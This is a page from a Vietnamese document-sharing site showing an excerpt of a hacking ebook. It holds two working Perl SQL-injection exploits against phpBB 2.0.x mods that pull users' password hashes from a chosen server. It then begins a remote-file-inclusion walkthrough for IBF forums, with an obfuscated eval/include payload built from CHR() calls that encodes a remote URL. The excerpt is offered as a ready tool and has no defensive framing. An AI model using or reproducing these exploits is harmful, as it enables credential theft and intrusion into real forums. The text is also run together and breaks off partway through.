1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 430 ppt

5 20 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 5
Dung lượng 60,04 KB

Nội dung

$dir = <STDIN>; chop ($dir); print q{ => User ID => Number: => }; $user = <STDIN>; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "alltopics.php?mode=&order=ASC&start=- 1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ; print " Exploit in process \r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process \r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } } ** Most Used Languages Module Sql injection For: phpBB ( 2.0.x - 2.0.21 ) Mod download: http://www.phpbbhacks.com/download/681 Code: #!/usr/bin/perl use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = <STDIN>; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; $dir = <STDIN>; chop ($dir); print q{ => User ID => Number: => }; $user = <STDIN>; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "demo_statistics.php?id=- 1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ; print " Exploit in process \r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process \r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } } (st tổng hợp) micimacko(HCE) IBF <=2.1.5 remote inclusion 5/5/2006 ( windak & langtuhaohoa ) Cũng giống như tut video của bên vniss ! Bước 1 : Tìm 1 forum nào đó create 1 topic với nội dung : CODE langtueval(include(CHR(104).CHR(116).CHR(116).CHR( 112).CHR(58).CHR(47 ).CHR(47).CHR(116).CHR(104).CHR(112).CHR(116).CHR( 98).CHR(109).CHR(116).CHR(46).CHR(98).CHR(105).CHR

Ngày đăng: 04/07/2014, 12:20